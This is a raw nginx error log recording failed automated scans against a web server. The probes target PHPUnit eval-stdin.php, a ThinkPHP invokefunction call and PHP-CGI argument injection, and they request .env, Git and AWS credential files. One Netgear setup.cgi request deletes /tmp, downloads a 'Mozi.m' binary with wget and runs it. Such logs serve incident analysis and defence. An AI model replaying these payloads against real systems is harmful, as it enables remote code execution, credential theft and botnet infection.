2026/02/17 07:00:19 [error] 912#912: *43988 open() "/var/www/html/blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 165.154.227.13, server: localhost-nginx-proxy-manager, request: "GET /blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/17 07:00:20 [error] 912#912: *43988 open() "/var/www/html/workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 165.154.227.13, server: localhost-nginx-proxy-manager, request: "GET /workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/17 07:00:20 [error] 912#912: *43988 open() "/var/www/html/panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 165.154.227.13, server: localhost-nginx-proxy-manager, request: "GET /panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/17 07:00:21 [error] 912#912: *43988 open() "/var/www/html/public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 165.154.227.13, server: localhost-nginx-proxy-manager, request: "GET /public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/17 07:00:21 [error] 912#912: *43988 open() "/var/www/html/apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 165.154.227.13, server: localhost-nginx-proxy-manager, request: "GET /apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/17 07:00:22 [error] 912#912: *43988 open() "/var/www/html/app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 165.154.227.13, server: localhost-nginx-proxy-manager, request: "GET /app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/17 07:00:23 [error] 912#912: *43988 open() "/var/www/html/index.php" failed (2: No such file or directory), client: 165.154.227.13, server: localhost-nginx-proxy-manager, request: "GET /index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1", host: "222.117.41.51:80"
2026/02/17 07:00:23 [error] 912#912: *43988 open() "/var/www/html/public/index.php" failed (2: No such file or directory), client: 165.154.227.13, server: localhost-nginx-proxy-manager, request: "GET /public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1", host: "222.117.41.51:80"
2026/02/17 07:00:25 [error] 912#912: *43988 open() "/var/www/html/containers/json" failed (2: No such file or directory), client: 165.154.227.13, server: localhost-nginx-proxy-manager, request: "GET /containers/json HTTP/1.1", host: "222.117.41.51:80"
2026/02/17 08:11:07 [error] 913#913: *44053 open() "/var/www/html/.git/credentials" failed (2: No such file or directory), client: 195.178.110.162, server: localhost-nginx-proxy-manager, request: "GET /.git/credentials HTTP/1.1", host: "222.117.41.51"
2026/02/17 09:35:33 [error] 906#906: *44111 open() "/var/www/html/hello.world" failed (2: No such file or directory), client: 173.212.241.115, server: localhost-nginx-proxy-manager, request: "POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1", host: "222.117.41.51:80"
2026/02/17 09:35:34 [error] 906#906: *44111 open() "/var/www/html/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 173.212.241.115, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/17 09:35:34 [error] 906#906: *44111 open() "/var/www/html/vendor/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 173.212.241.115, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/17 09:35:34 [error] 906#906: *44111 open() "/var/www/html/vendor/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 173.212.241.115, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/17 09:35:34 [error] 906#906: *44111 open() "/var/www/html/vendor/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 173.212.241.115, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/17 09:35:35 [error] 906#906: *44111 open() "/var/www/html/vendor/phpunit/phpunit/LICENSE/eval-stdin.php" failed (2: No such file or directory), client: 173.212.241.115, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/LICENSE/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/17 09:35:35 [error] 906#906: *44111 open() "/var/www/html/vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 173.212.241.115, server: localhost-nginx-proxy-manager, request: "GET /vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/17 09:35:35 [error] 906#906: *44111 open() "/var/www/html/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 173.212.241.115, server: localhost-nginx-proxy-manager, request: "GET /phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/17 09:35:36 [error] 906#906: *44111 open() "/var/www/html/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 173.212.241.115, server: localhost-nginx-proxy-manager, request: "GET /phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/17 09:35:36 [error] 906#906: *44111 open() "/var/www/html/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 173.212.241.115, server: localhost-nginx-proxy-manager, request: "GET /phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/17 09:35:36 [error] 906#906: *44111 open() "/var/www/html/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 173.212.241.115, server: localhost-nginx-proxy-manager, request: "GET /phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/17 09:35:37 [error] 906#906: *44111 open() "/var/www/html/lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 173.212.241.115, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/17 09:35:37 [error] 906#906: *44111 open() "/var/www/html/lib/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 173.212.241.115, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/17 09:35:37 [error] 906#906: *44111 open() "/var/www/html/lib/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 173.212.241.115, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/17 09:35:37 [error] 906#906: *44111 open() "/var/www/html/lib/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 173.212.241.115, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/17 09:35:38 [error] 906#906: *44111 open() "/var/www/html/lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 173.212.241.115, server: localhost-nginx-proxy-manager, request: "GET /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/17 09:35:38 [error] 906#906: *44111 open() "/var/www/html/laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 173.212.241.115, server: localhost-nginx-proxy-manager, request: "GET /laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/17 09:35:38 [error] 906#906: *44111 open() "/var/www/html/www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 173.212.241.115, server: localhost-nginx-proxy-manager, request: "GET /www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/17 09:35:39 [error] 906#906: *44111 open() "/var/www/html/ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 173.212.241.115, server: localhost-nginx-proxy-manager, request: "GET /ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/17 09:35:39 [error] 906#906: *44111 open() "/var/www/html/yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 173.212.241.115, server: localhost-nginx-proxy-manager, request: "GET /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/17 09:35:39 [error] 906#906: *44111 open() "/var/www/html/zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 173.212.241.115, server: localhost-nginx-proxy-manager, request: "GET /zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/17 09:35:39 [error] 906#906: *44111 open() "/var/www/html/ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 173.212.241.115, server: localhost-nginx-proxy-manager, request: "GET /ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/17 09:35:40 [error] 906#906: *44111 open() "/var/www/html/V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 173.212.241.115, server: localhost-nginx-proxy-manager, request: "GET /V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/17 09:35:40 [error] 906#906: *44111 open() "/var/www/html/tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 173.212.241.115, server: localhost-nginx-proxy-manager, request: "GET /tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/17 09:35:40 [error] 906#906: *44111 open() "/var/www/html/test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 173.212.241.115, server: localhost-nginx-proxy-manager, request: "GET /test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/17 09:35:41 [error] 906#906: *44111 open() "/var/www/html/testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 173.212.241.115, server: localhost-nginx-proxy-manager, request: "GET /testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/17 09:35:41 [error] 906#906: *44111 open() "/var/www/html/api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 173.212.241.115, server: localhost-nginx-proxy-manager, request: "GET /api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/17 09:35:41 [error] 906#906: *44111 open() "/var/www/html/demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 173.212.241.115, server: localhost-nginx-proxy-manager, request: "GET /demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/17 09:35:41 [error] 906#906: *44111 open() "/var/www/html/cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 173.212.241.115, server: localhost-nginx-proxy-manager, request: "GET /cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/17 09:35:42 [error] 906#906: *44111 open() "/var/www/html/crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 173.212.241.115, server: localhost-nginx-proxy-manager, request: "GET /crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/17 09:35:42 [error] 906#906: *44111 open() "/var/www/html/admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 173.212.241.115, server: localhost-nginx-proxy-manager, request: "GET /admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/17 09:35:42 [error] 906#906: *44111 open() "/var/www/html/backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 173.212.241.115, server: localhost-nginx-proxy-manager, request: "GET /backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/17 09:35:43 [error] 906#906: *44111 open() "/var/www/html/blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 173.212.241.115, server: localhost-nginx-proxy-manager, request: "GET /blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/17 09:35:43 [error] 906#906: *44111 open() "/var/www/html/workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 173.212.241.115, server: localhost-nginx-proxy-manager, request: "GET /workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/17 09:35:43 [error] 906#906: *44111 open() "/var/www/html/panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 173.212.241.115, server: localhost-nginx-proxy-manager, request: "GET /panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/17 09:35:44 [error] 906#906: *44111 open() "/var/www/html/public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 173.212.241.115, server: localhost-nginx-proxy-manager, request: "GET /public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/17 09:35:44 [error] 906#906: *44111 open() "/var/www/html/apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 173.212.241.115, server: localhost-nginx-proxy-manager, request: "GET /apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/17 09:35:44 [error] 906#906: *44111 open() "/var/www/html/app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 173.212.241.115, server: localhost-nginx-proxy-manager, request: "GET /app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/17 09:35:44 [error] 906#906: *44111 open() "/var/www/html/index.php" failed (2: No such file or directory), client: 173.212.241.115, server: localhost-nginx-proxy-manager, request: "GET /index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1", host: "222.117.41.51:80"
2026/02/17 09:35:45 [error] 906#906: *44111 open() "/var/www/html/public/index.php" failed (2: No such file or directory), client: 173.212.241.115, server: localhost-nginx-proxy-manager, request: "GET /public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1", host: "222.117.41.51:80"
2026/02/17 09:35:46 [error] 906#906: *44111 open() "/var/www/html/containers/json" failed (2: No such file or directory), client: 173.212.241.115, server: localhost-nginx-proxy-manager, request: "GET /containers/json HTTP/1.1", host: "222.117.41.51:80"
2026/02/17 12:01:33 [error] 923#923: *47148 open() "/var/www/html/robots.txt" failed (2: No such file or directory), client: 115.231.78.11, server: localhost-nginx-proxy-manager, request: "GET /robots.txt HTTP/1.1", host: "222.117.41.51:80"
2026/02/17 13:14:21 [error] 924#924: *48610 open() "/var/www/html/.env" failed (2: No such file or directory), client: 45.135.193.11, server: localhost-nginx-proxy-manager, request: "GET /.env HTTP/1.1", host: "222.117.41.51:80"
2026/02/17 13:14:21 [error] 924#924: *48610 open() "/var/www/html/.env.local" failed (2: No such file or directory), client: 45.135.193.11, server: localhost-nginx-proxy-manager, request: "GET /.env.local HTTP/1.1", host: "222.117.41.51:80"
2026/02/17 13:14:21 [error] 924#924: *48610 open() "/var/www/html/.env.staging" failed (2: No such file or directory), client: 45.135.193.11, server: localhost-nginx-proxy-manager, request: "GET /.env.staging HTTP/1.1", host: "222.117.41.51:80"
2026/02/17 13:14:22 [error] 924#924: *48610 open() "/var/www/html/.env.production" failed (2: No such file or directory), client: 45.135.193.11, server: localhost-nginx-proxy-manager, request: "GET /.env.production HTTP/1.1", host: "222.117.41.51:80"
2026/02/17 13:14:22 [error] 924#924: *48610 open() "/var/www/html/.env.development" failed (2: No such file or directory), client: 45.135.193.11, server: localhost-nginx-proxy-manager, request: "GET /.env.development HTTP/1.1", host: "222.117.41.51:80"
2026/02/17 13:14:22 [error] 924#924: *48610 open() "/var/www/html/.aws/credentials" failed (2: No such file or directory), client: 45.135.193.11, server: localhost-nginx-proxy-manager, request: "GET /.aws/credentials HTTP/1.1", host: "222.117.41.51:80"
2026/02/17 13:14:22 [error] 924#924: *48610 open() "/var/www/html/app/.env" failed (2: No such file or directory), client: 45.135.193.11, server: localhost-nginx-proxy-manager, request: "GET /app/.env HTTP/1.1", host: "222.117.41.51:80"
2026/02/17 13:14:23 [error] 924#924: *48610 open() "/var/www/html/config.json" failed (2: No such file or directory), client: 45.135.193.11, server: localhost-nginx-proxy-manager, request: "GET /config.json HTTP/1.1", host: "222.117.41.51:80"
2026/02/17 14:18:41 [error] 917#917: *53499 open() "/var/www/html/setup.cgi" failed (2: No such file or directory), client: 27.43.206.93, server: localhost-nginx-proxy-manager, request: "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0"
2026/02/17 14:48:31 [error] 917#917: *55821 open() "/var/www/html/.env" failed (2: No such file or directory), client: 34.158.168.101, server: localhost-nginx-proxy-manager, request: "GET /.env HTTP/1.1", host: "222.117.41.51:80"
2026/02/17 16:06:09 [error] 920#920: *63758 open() "/var/www/html/version" failed (2: No such file or directory), client: 36.255.223.98, server: localhost-nginx-proxy-manager, request: "GET /version HTTP/1.1", host: "222.117.41.51:80"
2026/02/17 16:06:09 [error] 920#920: *63762 open() "/var/www/html/v1" failed (2: No such file or directory), client: 36.255.223.98, server: localhost-nginx-proxy-manager, request: "GET /v1 HTTP/1.1", host: "222.117.41.51:80"
2026/02/17 16:10:05 [error] 917#917: *65711 open() "/var/www/html/.env" failed (2: No such file or directory), client: 34.158.168.101, server: localhost-nginx-proxy-manager, request: "GET /.env HTTP/1.1", host: "222.117.41.51:80"
2026/02/17 17:00:50 [error] 920#920: *71526 open() "/var/www/html/hello.world" failed (2: No such file or directory), client: 94.72.116.78, server: localhost-nginx-proxy-manager, request: "POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1", host: "222.117.41.51:80"
2026/02/17 17:00:55 [error] 920#920: *71526 open() "/var/www/html/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 94.72.116.78, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/17 17:00:57 [error] 920#920: *71526 open() "/var/www/html/vendor/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 94.72.116.78, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/17 17:00:58 [error] 920#920: *71526 open() "/var/www/html/vendor/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 94.72.116.78, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/17 17:01:00 [error] 920#920: *71526 open() "/var/www/html/vendor/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 94.72.116.78, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/17 17:01:02 [error] 920#920: *71526 open() "/var/www/html/vendor/phpunit/phpunit/LICENSE/eval-stdin.php" failed (2: No such file or directory), client: 94.72.116.78, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/LICENSE/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/17 17:01:03 [error] 920#920: *71526 open() "/var/www/html/vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 94.72.116.78, server: localhost-nginx-proxy-manager, request: "GET /vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/17 17:01:05 [error] 920#920: *71526 open() "/var/www/html/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 94.72.116.78, server: localhost-nginx-proxy-manager, request: "GET /phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/17 17:01:06 [error] 920#920: *71526 open() "/var/www/html/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 94.72.116.78, server: localhost-nginx-proxy-manager, request: "GET /phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/17 17:01:07 [error] 920#920: *71526 open() "/var/www/html/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 94.72.116.78, server: localhost-nginx-proxy-manager, request: "GET /phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/17 17:01:08 [error] 920#920: *71526 open() "/var/www/html/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 94.72.116.78, server: localhost-nginx-proxy-manager, request: "GET /phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/17 17:01:09 [error] 920#920: *71526 open() "/var/www/html/lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 94.72.116.78, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/17 17:01:11 [error] 920#920: *71526 open() "/var/www/html/lib/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 94.72.116.78, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/17 17:01:11 [error] 920#920: *71526 open() "/var/www/html/lib/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 94.72.116.78, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/17 17:01:12 [error] 920#920: *71526 open() "/var/www/html/lib/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 94.72.116.78, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/17 17:01:14 [error] 920#920: *71526 open() "/var/www/html/lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 94.72.116.78, server: localhost-nginx-proxy-manager, request: "GET /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/17 17:01:15 [error] 920#920: *71526 open() "/var/www/html/laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 94.72.116.78, server: localhost-nginx-proxy-manager, request: "GET /laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/17 17:01:16 [error] 920#920: *71526 open() "/var/www/html/www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 94.72.116.78, server: localhost-nginx-proxy-manager, request: "GET /www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/17 17:01:17 [error] 920#920: *71526 open() "/var/www/html/ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 94.72.116.78, server: localhost-nginx-proxy-manager, request: "GET /ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/17 17:01:18 [error] 920#920: *71526 open() "/var/www/html/yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 94.72.116.78, server: localhost-nginx-proxy-manager, request: "GET /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/17 17:01:19 [error] 920#920: *71526 open() "/var/www/html/zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 94.72.116.78, server: localhost-nginx-proxy-manager, request: "GET /zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/17 17:01:20 [error] 920#920: *71526 open() "/var/www/html/ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 94.72.116.78, server: localhost-nginx-proxy-manager, request: "GET /ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/17 17:01:20 [error] 920#920: *71526 open() "/var/www/html/V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 94.72.116.78, server: localhost-nginx-proxy-manager, request: "GET /V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/17 17:01:22 [error] 920#920: *71526 open() "/var/www/html/tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 94.72.116.78, server: localhost-nginx-proxy-manager, request: "GET /tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/17 17:01:23 [error] 920#920: *71526 open() "/var/www/html/test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 94.72.116.78, server: localhost-nginx-proxy-manager, request: "GET /test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/17 17:01:24 [error] 920#920: *71526 open() "/var/www/html/testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 94.72.116.78, server: localhost-nginx-proxy-manager, request: "GET /testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/17 17:01:26 [error] 920#920: *71526 open() "/var/www/html/api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 94.72.116.78, server: localhost-nginx-proxy-manager, request: "GET /api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/17 17:01:27 [error] 920#920: *71526 open() "/var/www/html/demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 94.72.116.78, server: localhost-nginx-proxy-manager, request: "GET /demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/17 17:01:30 [error] 920#920: *71526 open() "/var/www/html/cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 94.72.116.78, server: localhost-nginx-proxy-manager, request: "GET /cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/17 17:01:32 [error] 920#920: *71526 open() "/var/www/html/crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 94.72.116.78, server: localhost-nginx-proxy-manager, request: "GET /crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
